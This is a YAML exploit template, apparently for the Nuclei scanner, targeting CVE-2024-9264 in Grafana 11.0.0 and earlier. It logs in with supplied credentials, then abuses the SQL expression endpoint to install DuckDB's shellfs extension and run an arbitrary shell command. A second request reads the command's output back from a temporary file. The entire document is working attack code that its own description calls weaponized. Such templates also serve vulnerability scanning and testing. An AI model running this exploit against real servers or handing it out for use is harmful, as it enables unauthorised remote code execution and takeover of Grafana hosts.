id: CVE-2024-9264-RCE

info:
  name: Grafana <= 11.0.0 - Remote Code Execution
  author: byt3loss
  severity: high
  description: |
    Weaponize an SQLi to run commands on Grafana 11.0.0 and earlier versions - CVE-2024-9264
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9264
    - https://github.com/nollium/CVE-2024-9264
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-9264
  tags: grafana,authenticated,rce,exploit,cve

variables:
  output_file: "{{rand_text_alphanumeric(5)}}"
  time: "{{unix_time()}}"
  command: "id"

http:
  - method: POST
    path:
    - "{{RootURL}}/login"
    redirects: false
    max-redirects: 0
    headers:
      Referer: "{{RootURL}}"
      Content-Type: application/json
      Accept: application/json, text/plain, */*
    body: '{ "user": "{{username}}", "password": "{{password}}" }'

    cookie-reuse: true
    matchers-condition: and
    
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words: 
          - '"message":"Logged in"'

  - method: POST
    path:
    - "{{RootURL}}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
    redirects: true
    max-redirects: 3
    cookie-reuse: true
    headers:
      Content-Type: application/json
      Accept: application/json, text/plain, */*
    body: | 
      {
        "from": "1729313027261",
        "queries": [
            {
                "datasource": {
                    "name": "Expression",
                    "type": "__expr__",
                    "uid": "__expr__"
                },
                "expression": "SELECT 1; install shellfs from community; LOAD shellfs; SELECT * FROM read_csv('{{command}} >/tmp/{{output_file}} 2>&1 |')",
                "hide": false,
                "refId": "B",
                "type": "sql",
                "window": ""
            }
        ],
        "to": "1729334627261"
      }

  - method: POST
    path:
    - "{{RootURL}}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
    redirects: true
    max-redirects: 3
    cookie-reuse: true
    headers:
      Content-Type: application/json
      Accept: application/json, text/plain, */*
    body: | 
      {
        "from": "{{time}}",
        "queries": [
            {
                "datasource": {
                    "name": "Expression",
                    "type": "__expr__",
                    "uid": "__expr__"
                },
                "expression": "SELECT content FROM read_blob('/tmp/{{output_file}}')",
                "hide": false,
                "refId": "B",
                "type": "sql",
                "window": ""
            }
        ],
        "to": "{{time}}"
      }
    
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"values"\s*:\s*\[+\s*"(.+?)"\s*\]'